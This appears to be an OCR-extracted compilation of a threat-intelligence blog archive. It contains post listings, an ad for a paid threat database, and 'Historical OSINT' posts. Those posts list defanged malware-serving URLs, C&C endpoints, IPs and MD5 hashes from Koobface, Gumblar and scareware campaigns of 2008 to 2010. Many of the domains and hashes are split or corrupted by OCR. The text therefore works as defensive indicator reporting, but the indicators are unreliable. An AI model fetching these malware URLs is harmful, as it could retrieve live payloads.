(Potentially Unwanted Application)



• [393]Web site of Brazilian 'Prefeitura Municipal de 
Jaqueira' compromised, leads to fake Adobe Flash player 

• [394]Malicious multi-hop iframe campaign affects
thousands of Web sites, leads to a cocktail of client-side
exploits

• [395]Vendor of TDoS products/services releases new
multi-threaded SIP-based TDoS tool

• [396]Cybercriminals spamvertise tens of thousands of fake
'Sent from my iPhone' themed emails, expose users
to malware

• [397]Fake 'Annual Form (STD-261) - Authorization to Use
Privately Owned Vehicle on State Business' themed
emails lead to malware

• [398]'Newly released proxy-supporting Origin
brute-forcing tools targets users with weak passwords'

• [399]Fake WhatsApp 'Voice Message Notification' themed
emails expose users to malware

• [400]Cybercriminals impersonate HSBC through fake
'payment e-Advice' themed emails, expose users to malware

• [401]Fake 'MMS Gallery' notifications impersonate
T-Mobile U.K, expose users to malware



• [402]Fake 'October's Billing Address Code' (BAC) form 
themed spam campaign leads to malware 

21. December - 2013 

• [403]Cybercrime-friendly VPN service provider pitches 
itself as being 'recommended by Edward Snowden' 

• [404]Commercial Windows-based compromised Web shells 
management application spotted in the wild 

• [405]Compromised legitimate Web sites expose users to 
malicious Java/Symbian/Android "Browser Updates" 

• [406]Malicious multi-hop iframe campaign affects
thousands of Web sites, leads to a cocktail of client-side
exploits - part two

• [407]How cybercriminals efficiently violate YouTube,
Facebook, Twitter, Instagram, SoundCloud and Google+'s ToS

• [408]Tumblr under fire from DIY CAPTCHA-solving,
proxies-supporting automatic account registration tools

• [409]Newly launched 'HTTP-based botnet setup as a
service' empowers novice cybercriminals with bulletproof
hosting capabilities - part three

• [410]Cybercriminals offer fellow cybercriminals training in
Operational Security (OPSEC)

• [411]Fake 'WhatsApp Missed Voicemail' themed emails 
lead to pharmaceutical scams 



• [412]A peek inside the booming underground market for 
stealth Bitcoin/Litecoin mining tools 

• [413]Cybercrime Trends 2013 - Year in Review 

22. January - 2014 

• [414]'Adobe License Service Center Order NR' and 'Notice
to appear in court' themed malicious spam campaigns
intercepted in the wild

• [415]Vendor of TDoS products resets market life cycle of
well known 3G USB modem/GSM/SIM card-based TDoS tool

• [416]New TDoS market segment entrant introduces 96 SIM
cards compatible custom GSM module, positions
itself as market disruptor

• [417]DIY Python-based mass insecure WordPress
scanning/exploiting tool with hundreds of pre-defined
exploits spotted in the wild

• [418]Google's reCAPTCHA under automatic fire from a
newly launched reCAPTCHA-solving/breaking service

• [419]Fully automated, API-supporting service, undermines
Facebook and Google's 'SMS/Mobile number activation'
account registration process

• [420]Newly launched managed 'compromised/hacked
accounts E-shop hosting as service' standardizes the
monetization process

• [421]Newly released Web based DDoS/Passwords
stealing-capable DIY botnet generating tool spotted in the wild

• [422]Cybercriminals release new Web based keylogging 
system, rely on penetration pricing to gain market share 

23. February - 2014 

• [423]Cybercriminals release Socks4/Socks5 based Alexa 
PageRank boosting application 

• [424]Market leading 'standardized cybercrime-friendly
E-shop' service brings 2500+ boutique E-shops online

• [425]Managed TeamViewer based anti-forensics capable
virtual machines offered as a service

• [426]Malicious campaign relies on rogue WordPress sites,
leads to client-side exploits through the Magnitude
exploit kit

• [427]'Hacking for hire' teams occupy multiple
underground market segments, monetize their malicious
'know how'

• [428]DoubleClick malvertising campaign exposes long-run 
beneath the radar malvertising infrastructure 



• [429]Spamvertised 'Image has been sent' Evernote 
themed campaign serves client-side exploits 

• [430]Spamvertised 'You received a new message from
Skype voicemail service' themed emails lead to Angler
exploit kit

24. March - 2014 

• [431]Deceptive ads expose users to PUA.InstallBrain/PC 
Performer PUA (Potentially Unwanted Application) 

• [432]Managed Web-based 300 GB/s capable DNS 
amplification enabled malware bot spotted in the wild 

• [433]Commercial Windows-based compromised Web shells
management application spotted in the wild - part two

• [434]Multiple spamvertised bogus online casino themed
campaigns intercepted in the wild

• [435]5M+ harvested Russian mobile numbers service
exposes fraudulent infrastructure

• [436]Socks4/Socks5 enabled hosts as a service introduces
affiliate network based revenue sharing scheme

• [437]A peek inside a modular, Tor C&C enabled, Bitcoin
mining malware bot

• [438]Managed anti-forensics IMEI modification services
fuel growth in the non-attributable TDoS market segment

• [439]Commercially available database of 52M+ ccTLD
zone transfer domains spotted in the wild

• [440]Deceptive ads expose users to the
Adware.Linkular/Win32.SpeedUpMyPC.A PUAs (Potentially
Unwanted Applications)

• [441]DIY automatic cybercrime-friendly 'redirector
generating' service spotted in the wild - part two

• [442]Managed DDoS WordPress-targeting, XML-RPC API
abusing service, spotted in the wild

24. May - 2014 

• [443]Legitimate software apps impersonated in a blackhat
SEO-friendly PUA (Potentially Unwanted Application)
serving campaign

• [444]DIY cybercrime-friendly (legitimate) APK 
injecting/decompiling app spotted in the wild 

• [445]Malicious DIY Java applet distribution platforms going 
mainstream - part two 

• [446]Spamvertised 'Error in calculation of your tax' 
themed emails lead to malware 

• [447]A peek inside a subscription-based DIY keylogging
based type of botnet/malware generating tool

• [448]Spamvertised 'Notification of payment received' 
themed emails lead to malware 



• [449]Malicious JJ Black Consultancy 'Computer Support 
Services' themed emails lead to malware 

• [450]A peek inside a newly launched all-in-one E-shop for 
cybercrime-friendly services 

• [451]Long run compromised accounting data based type 
of managed iframe-ing service spotted in the wild 

Enjoy! 

Introducing Threat Data - The World's Most 
Comprehensive Threats Database (2018-09-20 16:30) 

Dear blog readers, I wanted to take the time and effort to introduce you to Threat Data - the World's Most Comprehensive Threats Database, a proprietary invite-only MISP-based data, information and knowledge sharing community managed and operated by me, which represents the vast majority of the proprietary threat intelligence research that I produce on a daily basis these days.

Users and organizations familiar with my research may be interested in the opportunity to obtain access to Threat Data, including a possible sample and a possible trial of the service.

Find below a sample FAQ about Threat Data and consider obtaining access to ensure that you and your organization remain on top of your game and ahead of current and emerging threats.

01. How to request access including a possible trial
including API access?

Approach me at ddanchev@cryptogroup.net

02. How do I obtain automated access?

The database is delivered daily/weekly/quarterly in MISP-friendly
JSON-capable format including STIX coverage.

03. How to request a sample?

Users interested in requesting a sample can approach me at
dancho.danchev@hush.com and I'd be more than happy
to offer a recent threat intelligence research snapshot.

04. Tell me more about the pricing options?

Monthly subscriptions covering daily, weekly and monthly updates start at $4,000, including guaranteed access to 24-32 analyses on a daily basis and active in-house all-source analysis, guaranteeing that your organization remains on top of its game by possessing the necessary data, information and knowledge to stay ahead of current and emerging threats.

05. What does the database cover? 

- Russian Business Network coverage 

- Koobface Botnet coverage 

- Kneber Botnet coverage 

- Hundreds of IOCs (Indicators of Compromise)

- Tactics, Techniques and Procedures in-depth coverage

- Malicious and fraudulent infrastructure mapped and 
exposed 

- Malicious and fraudulent Blackhat SEO coverage 

- Malicious spam and phishing campaigns 

- Malicious and fraudulent scareware campaigns 

- Malicious and fraudulent money mule recruitment scams 

- Malicious and fraudulent reshipping mule recruitment 
scams 

- Web based mass attack compromise fraudulent and
malicious campaigns

- Malicious and fraudulent client-side exploits serving
campaigns

The database also offers active malvertising, scareware, rogueware, malware, phishing, spam, IM malware, mobile malware, Mac OS X malware, Android malware, blackhat SEO, money mule recruitment and reshipping mule recruitment coverage, including ransomware coverage.

06. How often does it update?

Updates are issued on a daily, weekly and monthly basis, guaranteeing unlimited access to in-house all-source analysis as well as to the daily, weekly and monthly updates.

Enjoy! 

1.3 October

Historical OSINT - iPowerWeb Hacked Hundreds of Web Sites Affected (2018-10-19 18:17)

In 2008 it became evident that a widespread malware-embedded attack had taken place, successfully affecting hundreds of iPowerWeb customers and potentially exposing hundreds of legitimate Web sites to a multitude of malicious software, courtesy of a well-known [1]Russian Business Network hosting provider - HostFresh.

In this post we'll profile the campaign, provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it. We'll also establish a direct connection between the campaign's infrastructure and the [2]Russian Business Network.

Malicious URL: hxxp://58.65.232.33/gpack/index.php 

Related malicious URIs known to have participated in the campaign:

hxxp://58.65.232.25/counter/getexe.php?h=11

hxxp://58.65.232.25/counter/getfile.php?f=pdf

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 

1. https://ddanchev.blogspot.com/2013/08/dissecting-sample-russian-business.html

2. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

Historical OSINT - Gumblar Botnet Infects Thousands of Sites Serves Adobe Flash Exploits (2018-10-19 22:46)

According to [1]security researchers the [2]Gumblar botnet is making a comeback, successfully affecting thousands of users globally and potentially exposing the confidentiality, availability and integrity of the targeted hosts to a multitude of malicious client-side exploits serving domains, which further drop malicious software on the affected hosts.

In this post we'll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it.

Malicious URLs known to have participated in the 
campaign: 

hxxp://ncenterpanel.cn/php/unv3.php 

hxxp://ncenterpanel.cn/php/p31.php 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: 3f5b905c86d4dcaab9c86eddffle02c7 
MD5: 61461d9c9cl954193e5e0d4148a81a0c 
MD5:65cdlda3d4cc0616b4a0d4a862a865a6 
MD5: 7de29e5el0adc5d90296785c89aeabce 

Sample URL redirection chain: 

hxxp://gumblar.cn/rss/?id - 71.6.202.216 - Email: cuitiankai@googlemail.com

hxxp://gumblar.cn/rss/?id=2

hxxp://gumblar.cn/rss/?id=3

Related malicious domains known to have 
participated in the campaign: 



hxxp://martuz.cn - 95.129.145.58 

With Gumblar making a comeback it's becoming evident that cybercriminals continue utilizing the usual set of malicious and fraudulent tactics for the purpose of spreading malicious software and affecting hundreds of thousands of legitimate Web sites in a cost-effective and efficient way.

We'll continue monitoring the campaign and post updates as soon as new developments take place.

1. https://en.wikipedia.org/wiki/Gumblar

2. https://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity

Historical OSINT - A Diverse Portfolio of Fake Security Software (2018-10-20 20:22)

In this post I'll profile a currently circulating, circa 2008, malicious and fraudulent scareware-serving campaign successfully enticing users into interacting with rogue and fraudulent fake security software, with the cybercriminals behind the campaign successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts, largely relying on an affiliate-network based type of revenue-sharing scheme.

Related malicious domains known to have 
participated in the campaign: 


hxxp://drivemedirect.com

hxxp://virtualblog5.com

hxxp://fastwebway.com 

We'll continue monitoring the campaign and post updates
as soon as new developments take place.

Historical OSINT - Calling Zeus Home (2018-10-20 20:25)

Remember ZeuS? The infamous crimeware-in-the-middle exploitation kit? In this post I'll provide historical OSINT on various ZeuS-themed malicious and fraudulent campaigns intercepted throughout 2008 and provide actionable intelligence on the infrastructure behind the campaign.

Related malicious domains known to have 
participated in the campaign: 


We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 

Historical OSINT - Chinese Government Sites Serving Malware (2018-10-20 20:28)

It's 2008 and I'm stumbling upon yet another decent portfolio of compromised malware-serving Chinese government Web sites. In this post I'll discuss in-depth the campaign and provide actionable intelligence on the infrastructure behind it.

Compromised Chinese government Web site: 

hxxp://nynews.gov.cn

Sample malicious domains known to have 
participated in the campaign: 

hxxp://gamel983.com/index.htm

hxxp://sp.070808.net/23.htm

hxxp://higain-hitech.com/mm/index.html



Currently affected Chinese government Web sites: 

hxxp://www.tgei.gov.cn/dom.txt - iframe -
hxxp://www.bll0b.com/chbr/110.htm?id=884191

hxxp://hfinvest.gov.cn/en/aboutus/index.asp - iframe -
hxxp://nnbzcl2.kki.cn/indax.htm

hxxp://www.whkx.gov.cn/iii.txt - iframe -
hxxp://user.free2.77169.net/shmilyzhutou/evil.htm

hxxp://xc.haqi.gov.cn/jay.htm - iframe -

hxxp://xc.haqi.gov.cn/jay.htm - hxxp://qqnw.gov.cn/ST.htm

hxxp://www.whkx.gov.cn/mohajem.txt - iframe -
hxxp://user.free2.77169.net/shmilyzhutou/evil.htm

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 

Historical OSINT - Hundreds of Bogus Bebo Accounts Serving Malware (2018-10-20 20:29)

It's 2010 and I've recently intercepted a widespread malware-serving Bebo campaign successfully enticing users into interacting with the fraudulent and malicious content, potentially exposing the confidentiality, availability and integrity of the targeted hosts to a multitude of malicious software.



Sample malicious domains known to have 
participated in the campaign: 

hxxp://boss.gozbest.net/xd.html - 216.32.83.110 

hxxp://tafficbots.com/in.cgi?6

hxxp://bolapaqir.com/in.cgi?2

hxxp://mybig-porn.com/promo4/?aid=1339

We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 

Historical OSINT - PhishTube Twitter Broadcast Impersonated Scareware Serving Twitter Accounts Circulating (2018-10-20 22:10)

It's 2010 and I've recently intercepted a currently circulating malicious and fraudulent malware-serving spam campaign successfully enticing hundreds of thousands of users globally into interacting with the rogue and malicious software found on the compromised hosts, in combination with a currently active Twitter malware-serving campaign successfully enticing users into interacting with the rogue and bogus content.

In this post I'll provide actionable intelligence on the infrastructure behind the campaign.



Sample malicious domains known to have 
participated in the campaign: 


hxxp://su7.us/tds/go.php?sid=1

Sample URL redirection chain: 

hxxp://66.199.229.253/etds/go.php?sid=4 -> ->
hxxp://mybig-porn.com/promo1/?aid=1470 ->
hxxp://online-adult-directory.com/?aid=10012 ->
hxxp://yourdatingnetwork.com/?aid=697

Sample malware known to have participated in the 
campaign: 

MD5: a4ff9c2b4fd6917dl2e962a7b6173143 

Historical OSINT - Massive Blackhat SEO Campaign Courtesy of the Koobface Gang Spotted in the Wild (2018-10-20 22:28)

It's 2010 and I've recently stumbled upon yet another massive blackhat SEO campaign courtesy of the Koobface gang, successfully exposing hundreds of thousands of users to a multitude of malicious software.

In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample domains known to have participated in the 
campaign: 


hxxp://xzkugsueeu nk.5nxs.com 

hxxp://vvbovxi iidym.5nxs.com 

hxxp://q inozkiuidyw.5nxs.com 

hxxp://tpd umweuughh.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://tpd umweuughh.5nxs.com 

hxxp://zkfud peaaech.5nxs.com 

hxxp://vvcijfu eeamk.5nxs.com 

hxxp://j khihdiuuypw.5nxs.com 
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hxxp://womancoi uyav.5nxs.com 
hxxp://sfkoyfooepgh. 5 nxs.com 
hxxp://zzhetq aooxkd.5nxs.com 
hxxp://czj udyeaacjp.5nxs.com 
hxxp://gssudpeaaecg.5nxs.com 
hxxp://wi uobvooozjp.5nxs.com 



hxxp://twaamnaookhd. 5 nxs.com 

hxxp://bbvocloi igsr.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://dspugdu uuytm.5nxs.com 

hxxp://klj igdueeqic.5nxs.com 

hxxp://g pioxhuuutav.5nxs.com 

hxxp://wouavcooiy il.5nxs.com 

hxxp://mevoxl iuuyrm.5nxs.com 

hxxp://xvcocxoiojfy. 5 nxs.com 

hxxp://zlj udyeaaunl.5nxs.com 

hxxp://woaabcoi usst.5nxs.com 

hxxp://d ppudpeeewmh.5nxs.com 

hxxp://zzh ustueequk.5nxs.com 

hxxp://qu boczoiolgd.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://kdwetmoi uics.5nxs.com 

hxxp://jgfudseeerqb. 5nxs.com 

hxxp://q unolhueeonx.5nxs.com 

hxxp://khd usyeaaeez.5nxs.com 



hxxp://bvci kg ueequx.5nxs.com 

hxxp://xzj upteaovzg.5nxs.com 

hxxp://rml udpueoebj.5nxs.com 

hxxp://pfyu pteeeauz.5nxs.com 

hxxp://qqreqnoeewhs.5nxs.com 

hxxp://ysfuy raaaczs.5nxs.com 

hxxp://ljd udyeaamcj.5nxs.com 

hxxp://vbvovzi iustm.5nxs.com 

hxxp://gffugd ueeibz.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://bnjdzkiu uyw.007gb.com 

hxxp://d pppdpeeeii.007gb.com 

hxxp://zzfd hdeeeoe.007gb.com 

hxxp://h hhhzciuusa.007gb.com 

hxxp://d pmlbkiuuta.007gb.com 

hxxp://ccgsg peaaev.007gb.com 

hxxp://vbzxecoi uso.007gb.com 

hxxp://n bkfhdeaack.007gb.com 

hxxp://bmvcaoeeaoe. 007gb.com 



hxxp://xchfgg iuewq.007gb.com 
hxxp://jgypg peaoxh.007gb.com 
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Sample malicious domains known to have 
participated in the campaign: 

hxxp://jgypg peaoxh.007gb.com 

hxxp://hdstpraoojd.007gb.com 

hxxp://n nkkvziiigh.007gb.com 

hxxp://q wyduquuoeo.007gb.com 

hxxp://j hgdkzooobn.007gb.com 

hxxp://ljyqweoi ihf.007gb.com 

hxxp://xzfdfsueaux.007gb.com 

hxxp://kjfhzj ueeae.007gb.com 

hxxp://tan buoeaanb.007gb.com 

hxxp://rammooaaocx. 007gb.com 

hxxp://g smxmlueoht.007gb.com 

hxxp://xxjg kg uueuu.007gb.com 

hxxp://jg ppfpeeaev.007gb.com 

hxxp://xzfpfpeaozh.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 



hxxp://khsphdueaev.007gb.com 

hxxp://wabn ieoiikg.007gb.com 

hxxp://rojshgeoisw.007gb.com 

hxxp://zl hffgueaec.007gb.com 

hxxp://q uxxmnoiokd.007gb.com 

hxxp://rpsd kzoeeqq.007gb.com 

hxxp://rozfksaoiht.007gb.com 

hxxp://vvzkcvi iuru.007gb.com 

hxxp://ptgdg hueedq.007gb.com 

hxxp://xvj hcliuufi.007gb.com 

hxxp://y wqntweaeqo.007gb.com 

hxxp://mu bwqaaaoxl.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://quzj lgueeib.007gb.com 

hxxp://fdyttteeaou.007gb.com 

hxxp ://xxjggseeeom.007gb.com 

hxxp://robvi moiikg.007gb.com 

hxxp://hgspsyeeanx.007gb.com 

hxxp ://n bzkckueein.007gb.com 



hxxp://syfdg moiipy.007gb.com 

hxxp://n mkjzjueequ.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://n mkjzjueequ.007gb.com 

hxxp://ytwqyteaaen.007gb.com 

hxxp://kgdfkhu uuyq.007gb.com 

hxxp://zbcvieaoocc.007gb.com 

hxxp://sywrdpeeeie. 007gb.com 

hxxp://prn mwaaaamm.007gb.com 

hxxp://djdd hfuuilc.007gb.com 

hxxp://wi bnuboiusw.007gb.com 

hxxp://mucl mboiigd.007gb.com 
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hxxp://vvl kevoiidy.007gb.com 

hxxp://xh prrteaaun.007gb.com 

hxxp://bncvoeaaauu.007gb.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://ravhzl uuewo.007gb.com 

hxxp://gsywptaaabz.007gb.com 



hxxp://xxkzbcoi ijd.007gb.com 

hxxp://mevi rwaaovlf.hostevo.com 

hxxp://roboxl oiihdt.007sites.com 

hxxp://rauon booozkf.007sites.com 

hxxp://ywi atreeewam.007sites.com 

hxxp://nxfetmaoolfr.007sites.com 

hxxp://g kmelbeuoear.007sites.com 

hxxp://mmcig sueeexg.007sites.com 

hxxp://vxxi ljoioxxg.10fast.net 

hxxp://jgsuspeeeaic. 10fast.net 

hxxp://qenocxi iihsr.10fast.net 

hxxp ://l kl ill iiigdt.10fast.net 

hxxp ://hgdepreaamzs. 10fast.net 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://gffu pteaaebj.10fast.net 

hxxp:///kljigfuuugfp.lOfast.net 

hxxp ://rai anvoiokgy.10fast.net 

hxxp://rtqerqeaamcg. 10fast.net 

hxxp ://gfdu gdeaavls.10fast.net 



hxxp://ddterboi ugsr.10fast.net 

hxxp://jgpewnoi ihpq.10fast.net 

hxxp://kjfpfseeeqo.007gb.com 

hxxp://wu bcmciuuya.007gb.com 

hxxp://quzkxvooift.007gb.coml 

hxxp://n blhlheaaum.007gb.com 

hxxp://cclxnci uupq.007gb.com 

hxxp://n bhkckueeib.007gb.com 

hxxp://hgddxl iuudp.007gb.com 

hxxp://wi nilhueuwiz.10fast.net 

hxxp://queocl iuupqv.10fast.net 

hxxp://g dtaqboiihhs.10fast.net 

hxxp://bbvovbaaa ncg.10fast.net 

hxxp://fpramvoi iftm.10fast.net 

hxxp://fj I iljiiizhp.10fast.net 

hxxp://gspedpeeeiel.lOfast.net 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://fssu kjaoanbx.5nxs.com 

hxxp://ptaa wviuuppw.5nxs.com 



hxxp ://l lxozkoiikdq.5nxs.com 
hxxp://kkkijguuuquz.5 nxs.com 
hxxp ://womobci iiftn.5nxs.com 
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hxxp ://vvci kg ueequl.5nxs.com 
hxxp ://zzzoxcooozzl. 5 nxs.com 
hxxp ://wu uocziuupwn.5nxs.com 
hxxp ://hfyeq noiiftm.5nxs.com 
hxxp ://sttewboookgy. 5 nxs.com 
hxxp ://g hhusteaozgt.5nxs.com 
hxxp ://fjzoqtu uukiw.5nxs.com 
hxxp ://mu uaqciueomz.5nxs.com 
hxxp ://fsfugd uuutav.5nxs.com 
hxxp ://j gdeywaoocks.5nxs.com 
hxxp://rani ljuuurix.5nxs.com 
hxxp ://pabi khueamcg.5nxs.com 
hxxp ://g steqbooikdr.5nxs.com 
hxxp ://l I hugfuuerab.5nxs.com 
hxxp://dspeyyeeeauv.5nxs.com 
hxxp ://xzkixhu aoczg.5nxs.com 



hxxp ://rouawmaaammz. 5 nxs.com 

hxxp://kxl ijjiuuspt.5nxs.com 

hxxp ://xzl iljiuifyw.5nxs.com 

hxxp://vvvi lhiueqac.5nxs.com 

hxxp ://tovi khiiufdt.5nxs.com 

hxxp ://ttretreeu hgs.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://y pserreeuytq.5nxs.com 

hxxp ://xxzij kiiikkf.5nxs.com 

hxxp ://bvzoknaoi gpm.5nxs.com 

hxxp ://n nxihduuutqv.5nxs.com 

hxxp ://muzi dyeeeevh.5nxs.com 

hxxp ://tpd ufhiiidrn.5nxs.com 

hxxp://ffpu pteeeaqd.5nxs.com 

hxxp ://bbxigseeol pm. 5 nxs.com 

hxxp://gsdug peaeibj.5nxs.com 

hxxp ://pwteyyeaamcg. 5 nxs.com 

hxxp ://zxcolj iiigpw.5nxs.com 

hxxp ://bmacxoi ixjs.5nxs.com 



hxxp://twqawmaooczf. 5 nxs.com 

hxxp://bbrartuau hjh.5nxs.com 

hxxp://dti olhueeexd.5nxs.com 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://gddu hgiiikhd.5nxs.com 

hxxp://ryqu hfuuuypr.5nxs.com 

hxxp://sfh ijkiuusrn.5nxs.com 

hxxp://staen naoolgy.5nxs.com 

hxxp://vvvoczooolzg. 5 nxs.com 

hxxp://bmnokg ueequz.5nxs.com 

hxxp://proocxoi igds.5nxs.com 

hxxp://ptwepwaoozht.5 nxs.com 

hxxp://fsdufpeeeovg.5nxs.com 
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hxxp://dtl id woiuyoz.5nxs.com 
hxxp://kvyamboi uhsr.5nxs.com 
hxxp://kvmard ioetyp.5nxs.com 
hxxp://tan iljueuwul.5nxs.com 
hxxp://j vnartuuixvx.5nxs.com 



hxxp://qu bijgiuutac.5nxs.com 

Sample malicious domains known to have 
participated in the campaigns: 

hxxp://qeboczi uidfy.10fast.net 

hxxp://gffudpeeeauc. 10fast.net 

hxxp ://v bj u sta i u rox. 1 Ofast. n et 

hxxp://jgyu ptaoutic.10fast.net 

hxxp ://l khighueeevk.10fast.net 

hxxp://ptpudreeeobz. 10fast.net 

hxxp ://meeambaooxls. 10fast.net 

hxxp ://y rreyraaovld.10fast.net 

hxxp ://kkd utwaoobzd.10fast.net 

hxxp ://czxitbou uquz.10fast.net 

hxxp ://l vbovnaoozjp.10fast.net 

hxxp ://wi iambaookdt.10fast.net 

hxxp ://zxkij gueaecg.10fast.net 

hxxp ://y wqawqaoovzh.10fast.net 

hxxp ://gzou kwuuizbv.10fast.net 

hxxp://roiabcoi igpq.10fast.net 

hxxp ://vvl ufseaavld.10fast.net 



hxxp://hg pusyeaamxg.10fast.net 

hxxp://kkki kziiifyq.10fast.net 

hxxp://dtq aczoiuswb.10fast.net 

hxxp://l lzozxoiigpw.10fast.net 

hxxp://n mcijkiuuobg.10fast.net 

hxxp://mnxij liuusrm.10fast.net 

hxxp://q uuanbooikfy.10fast.net 

hxxp://xxzij huueuex.10fast.net 

hxxp://gsyepyeaau bk.10fast.net 

hxxp://tqoaqmaoigsr. 10fast.net 

hxxp://cvboczi iikgp.10fast.net 

hxxp://gdyepteaancj. 10fast.net 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://q ibocziuewuz.10fast.net 

hxxp://q rkargoaatsf.10fast.net 

hxxp://zzdey maoifyq.10fast.net 

hxxp://noeancoi utac.10fast.net 

hxxp://q unovnaaammb.10fast.net 

hxxp://gffugdeeei bk.10fast.net 



hxxp://cmvijsueen Is. 10fast.net 
hxxp://tqaeryeaanxj. 10fast.net 
hxxp://xmua mbiiifyt.10fast.net 
hxxp://cvnan neeesff.10fast.net 
hxxp://mu uaqbooolfy.10fast.net 
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hxxp://q imacvaaetyr.10fast.net 
hxxp://vxfutqaoi hsw.10fast.net 
hxxp://y wreyruuuhhg.10fast.net 
hxxp://fdteyteeeoel. 10fast.net 
hxxp://y wianvoiupwc.10fast.net 
hxxp://zl geyraoobls.10fast.net 
hxxp ://zkhujdeaoj pm. 10fast.net 
hxxp://kjfufd uuutqm.10fast.net 
hxxp ://xxj udpueewiz.10fast.net 
hxxp ://rooewmeaa meg. 10fast.net 
hxxp ://hffugd ueeink.10fast.net 
hxxp ://xmcoxzoi ikkd.10fast.net 
hxxp ://l 11 izkuiifyq.10fast.net 
hxxp ://xmua psuiovnb.10fast.net 



hxxp://tq uanvoiuyqv.10fast.net 
hxxp://kvnartu uujlk.10fast.net 
hxxp://l I likhioozjf.10fast.net 
hxxp://y rreypeeamck.10fast.net 
hxxp://g I hihfueaeck.10fast.net 

Sample malicious domains known to have participated in the campaign:

hxxp://goadult.info/go.php?sid=13 ->
hxxp://goadult.info/go.php?sid=9 ->
hxxp://r2606.com/go/?pid=30937

-> which is a well-known Koobface 1.0 command and control server domain.

Related malicious redirectors known to have 
participated in the campaign: 

hxxp://goadult.info - 78.109.28.16 - tech@goadult.info 

hxxp://golgo.net - 174.36.214.32 - tech@golgo.net 

hxxp://wpills.info - 174.36.214.3 - Email: tech@wpills.info 

Historical OSINT - Latvian ISPs, Scareware, and the Koobface Gang Connection (2018-10-20 22:34)

It's 2010 and we've recently stumbled upon yet another malicious and fraudulent campaign courtesy of the Koobface gang, actively serving fake security software, also known as scareware, to a variety of users, with the majority of the malicious software conveniently parked within 79.135.152.101 - AS2588, LatnetServiss-AS LATNET ISP, successfully hosting a diverse portfolio of fake security software.

In this post, I'll provide actionable intelligence on the infrastructure behind the campaign and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it.

Sample malware known to have participated in the campaign:

installed.exe - MD5: 4ab2cb0dd839df64ec8d682f904827ef - Trojan.Crypt.ZPACK.Gen; Mal/FakeAV-CQ - Result: 9/40 (22.50 %)

Related malicious phone back C&C server IPs:

hxxp://av-plusonline.org/install/avplus.dll

hxxp://av-plusonline.org/cb/real.php?id=

Related malicious MD5s known to have participated in the campaign:

avplus.dll - MD5: 57c79fb723fcbf4d65f4cd44e00ff3ed - FakeAlert-LF; Mal/FakeAV-CL - Result: 6/39 (15.39 %)

It gets even more interesting, as hxxp://fast-payments.com - 91.188.59.27 is parked within Koobface botnet's 1.0 phone back locations (hxxp://urodinam.net) and is also hosted within the same netblock at 91.188.59.10.

Sample related malicious URLs known to have participated in the campaign:

hxxp://urodinam.net/33t.php?stime=125558

- hxxp://91.188.59.10/opa.exe - MD5: d4aacc8d01487285be564cbd3a4abc76 - Downloader.VB.7.S; Mal/Koobface-B - Result: 10/40 (25 %)

Once executed, a sample malware phones back to the following malicious C&C server IPs:

hxxp://aburvalg.com/newl.php - 64.27.0.237

- hxxp://fucking-tube.net

The following domains use it as a name server:

hxxp://nsl.addedantivirus.com

Related malicious domains known to have responded to the same malicious name server:




Related malicious URLs known to have participated in 
the campaign: 

hxxp://avplus-online.org/buy.php?id=

- hxxp://fast-payments.com/index.php?prodid=antivirplus 02 01 &afid=

Related malicious domains known to have 
participated in the campaign: 


We'll continue monitoring the campaign and post updates as 
soon as new developments take place. 

Historical OSINT - Massive Scareware Dropping Campaign Spotted in the Wild (2018-10-20 22:38)

It's 2008 and I've recently spotted a currently circulating malicious and fraudulent scareware-serving domain portfolio, which I'll expose in this post with the idea to share actionable threat intelligence with the security community, further exposing and undermining the cybercrime ecosystem the way we know it and potentially empowering security researchers and third-party vendors with the necessary data to stay ahead of current and emerging threats.

Related malicious domains known to have 
participated in the campaign: 


We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 

Historical OSINT - Malware Domains Impersonating Google (2018-10-20 22:51)

It's 2008 and I've recently stumbled upon a currently active typosquatted portfolio of malware-serving domains successfully impersonating Google, further spreading malicious software to hundreds of thousands of unsuspecting users.

In this post I'll provide actionable intelligence on the infrastructure behind the campaign.

Related malicious domains known to have 
participated in the campaign: 


We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 

Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild (2018-10-21 22:35)

It's 2008 and I recently came across a pretty decent portfolio of rogue and fraudulent malicious scareware-serving domains successfully acquiring traffic through a variety of black hat SEO techniques, in this particular case the airplane crash of the Polish president.

Related malicious domains known to have 
participated in the campaign: 


Sample URL redirection chain:

hxxp://cooldesigns4u.co.uk/sifr.php

- hxxp://visittds.com/su/in.cgi?2 - 213.163.89.55 - Email: johnvernet@gmail.com

- hxxp://scaner24.org/?affid=184 - 91.212.127.19 - Email: bobarter@xhotmail.net

Redirectors parked on 213.163.89.55 (AS49544, INTERACTIVE3D-AS Interactive3D) include:


We've already seen hxxp://google-analyze.org and hxxp://yahoo-analytics.net in several related [1]mass compromises of Embassy Web sites.

We'll continue monitoring the campaign and post updates as new developments take place.

1. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

